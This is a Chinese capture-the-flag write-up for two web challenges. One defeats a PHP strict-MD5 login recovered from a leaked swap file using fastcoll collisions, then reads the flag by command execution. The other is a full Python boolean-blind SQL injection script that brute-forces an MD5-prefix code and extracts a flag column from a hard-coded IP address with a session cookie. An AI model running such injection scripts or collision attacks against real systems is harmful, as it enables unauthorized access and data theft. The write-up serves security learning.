神奇的md5
目录扫描发现泄露的编辑器交换文件（.swp），恢复后得到如下源码：
session_start();
// Silence every warning/notice so nothing about the checks below (or a
// "headers already sent" warning) is leaked to the client.
error_reporting(0);
// All three POST fields must be present and truthy; the @ hides the undefined-index notice.
if (@$_POST['username'] and @$_POST['password'] and @$_POST['code'])
{
// (string) cast: md5() below only ever sees strings -- presumably to block the
// md5(array) trick, where md5() would return NULL instead of a digest.
$username = (string)$_POST['username'];
$password = (string)$_POST['password'];
$code = (string)$_POST['code'];
// Loose == comparison: the three values must be pairwise different as PHP sees them
// (== compares two numeric strings by value, so e.g. "1e1" and "10" count as the same).
if (($username == $password ) or ($username == $code) or ($password == $code)) {
echo "Your input can't be the same";
}
// Strict === on the 32-char hex digests: three *different* inputs sharing one MD5, i.e.
// a real collision is required. The "0e..." magic-hash trick only works under ==.
else if ((md5($username) === md5($password)) and (md5($password) === md5($code))){
echo "Good";
// "Good" has already been echoed, so this Location header only takes effect if output
// buffering is enabled; the resulting warning is hidden by error_reporting(0).
header('Location: admin.php');
exit();
} else {
echo "<pre> Invalid password</pre>";
}
}
利用 fastcoll 进行 MD5 强碰撞：检查要求三个互不相同的输入拥有同一个 MD5（== 拒绝相同值，=== 要求摘要完全一致），而 fastcoll 一次只产生一对碰撞，可以把其中一条作为前缀再跑一次得到第三条（多碰撞）。碰撞文件含二进制字节，POST 时要 URL 编码后原样发送。通过检验跳转到 admin.php 之后就是命令执行，读 flag 用 `cat /fla?`（? 为 shell 通配符）。
sqli-1
先爆破 4 位 md5 前缀得到 code，再逐字符比较 ascii 做布尔盲注：
import requests  # third-party HTTP client; every probe against the target goes through it
import hashlib  # backs the md5() helper below
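def md5(data):
    """Return the hex MD5 digest of *data*.

    Args:
        data: ``str`` or ``bytes``. A ``str`` is UTF-8 encoded first, so the
            helper works on Python 3 (where hashlib only accepts bytes) as
            well as Python 2. The parameter was previously named ``str``,
            which shadowed the builtin.

    Returns:
        The 32-character lowercase hex digest.
    """
    if not isinstance(data, bytes):
        data = data.encode('utf-8')
    return hashlib.md5(data).hexdigest()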
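# Target and the author's logged-in session. PHPSESSID is a live secret tied to
# that login: the server appears to validate the md5 "code" against it, which is
# why it is sent with every request. Rotate it and never commit it.
URL = 'http://118.89.111.179:3000/'
COOKIE = {
    'PHPSESSID': '9jgb4e4s866rpfq3ivhg75r6fq'
}
TIMEOUT = 10         # seconds per request; the original had none, so one stalled request hung the whole run
MAX_CODE = 10000000  # upper bound of the code brute-force, as in the original
MAX_LEN = 1000       # upper bound on the extracted value's length, as in the original
# Where the 4-hex-char md5 prefix sits in the page body. Fragile: it depends on
# the exact HTML of the challenge page -- re-check r.text if the layout changes.
PREFIX_SLICE = slice(35, 39)

# Earlier recon stages used the same oracle with a different subquery:
#   database()                                                          -> hgame
#   group_concat(TABLE_NAME)  from information_schema.TABLES
#                             where TABLE_SCHEMA=database()             -> f1l1l1l1g,words
#   group_concat(COLUMN_NAME) from information_schema.COLUMNS
#                             where TABLE_NAME='f1l1l1l1g'              -> f14444444g
# Boolean oracle: 'welcome' appears in the response iff the condition holds.
# The injection point is numeric (no quoting needed), so the condition is
# appended with a bare "and". Note substr() is 1-indexed.
PAYLOAD = "1 and (ascii(substr((select f14444444g from f1l1l1l1g limit 0,1),%d,1))=%d)"


def _build_prefix_table(limit=MAX_CODE):
    """Map each 4-hex-char md5 prefix to the smallest int x whose md5(str(x)) starts with it.

    Built once up front; the original re-brute-forced up to 10M hashes for
    every single probe. Stops early once all 16**4 prefixes are covered.
    """
    table = {}
    for x in range(limit):
        prefix = md5(str(x).encode('ascii'))[:4]
        if prefix not in table:
            table[prefix] = x
            if len(table) == 16 ** 4:
                break
    return table


def _fetch_code(table):
    """GET the challenge page and return a code matching the md5 prefix it shows.

    Raises RuntimeError instead of silently sending code=0 (the original's
    fallback) when the prefix is not in *table*, which means the page layout
    changed or the prefix lies outside the brute-forced range.
    """
    r = requests.get(URL, cookies=COOKIE, timeout=TIMEOUT)
    prefix = r.text[PREFIX_SLICE]
    code = table.get(prefix)
    if code is None:
        raise RuntimeError('no code found for md5 prefix %r; check PREFIX_SLICE' % (prefix,))
    return code


def _oracle(code, payload):
    """Return True when the injected condition held (response contains 'welcome').

    params= lets requests URL-encode the payload; the server decodes it back
    to the same string the original interpolated into the URL unencoded.
    """
    r = requests.get(URL, params={'code': code, 'id': payload},
                     cookies=COOKIE, timeout=TIMEOUT)
    return 'welcome' in r.text


def main():
    """Extract the f14444444g value character by character and return it."""
    table = _build_prefix_table()
    res = ''
    # substr() is 1-indexed, so start at 1: position 0 yields '' (ascii 0) and
    # can never match -- the original burned a full round of probes on it.
    for i in range(1, MAX_LEN + 1):
        found = False
        # Printable ASCII including space (the original skipped 32).
        for j in range(32, 127):
            # The server seems to issue a fresh code on every request, so a
            # page fetch precedes each probe exactly as in the original.
            code = _fetch_code(table)
            if _oracle(code, PAYLOAD % (i, j)):
                res += chr(j)
                print(res)
                found = True
                break
        if not found:
            # No printable char matched: we ran past the end of the value
            # (substr returns '' there), so stop instead of probing to MAX_LEN.
            break
    print('done: %s' % res)
    return res


if __name__ == '__main__':
    main()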